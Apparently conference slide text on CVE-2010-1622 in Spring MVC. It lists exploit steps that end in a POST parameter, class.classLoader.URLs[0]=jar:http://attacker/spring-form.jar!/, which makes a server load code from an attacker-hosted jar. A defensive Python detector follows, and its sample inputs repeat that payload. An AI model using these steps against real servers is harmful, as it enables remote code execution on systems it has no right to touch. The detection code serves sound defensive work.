view.getClass().forName('java.lang.Runtime'). - 2010 - Ruxcon
CVE-2010-1622 exploit

1. Download org.springframework.web.servlet-X.X.X.RELEASE.jar
2. Edit spring-form.tld and add tag file definitions for all tags. Example for tag: input /META-INF/tags/InputTag.tag
3. Create corresponding tag files, e.g. InputTag.tag:
4. Bundle everything back into spring-form.jar and put it up online
5. Submit POST request to a form controller with the following parameter:
   class.classLoader.URLs[0]=jar:http://attacker/spring-form.jar!/

Thursday, November 25, 2010
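A defender-side check for the request parameter in the last step, as an added example that is not part of the original slides: it flags form parameters whose bean property path passes through `class` or `classLoader`. The function name, the deny list and the sample request bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Path segments that should never be bound from a request (assumed deny list).
DENIED_SEGMENTS = {"class", "classloader"}
# Index or map-key suffixes such as URLs[0] or pets['a.b'].
_INDEX = re.compile(r"\[[^\]]*\]")


def suspicious_params(form_body):
    """Return parameter names whose property path walks through a denied segment."""
    hits = []
    # parse_qsl percent-decodes each name once before it is inspected.
    for name, _value in parse_qsl(form_body, keep_blank_values=True):
        path = _INDEX.sub("", name)
        # Whole-segment, case-insensitive match: 'classification' must not hit.
        segments = [seg.strip().lower() for seg in path.split(".")]
        if any(seg in DENIED_SEGMENTS for seg in segments):
            hits.append(name)
    return hits


# Constructed sample POST bodies (not captured traffic).
SAMPLES = [
    "name=alice&address.city=Perth",
    "classification=public&owner.classRoom=3",
    "class.classLoader.URLs%5B0%5D=jar:http://attacker/spring-form.jar!/",
    "pets%5B0%5D.class.classLoader.URLs%5B0%5D=x&name=bob",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(suspicious_params(body) or "clean", "<-", body)
```

The same whole-segment test can run in a request filter or over logged form bodies; matching on segments rather than substrings keeps ordinary field names such as `classification` from raising alerts.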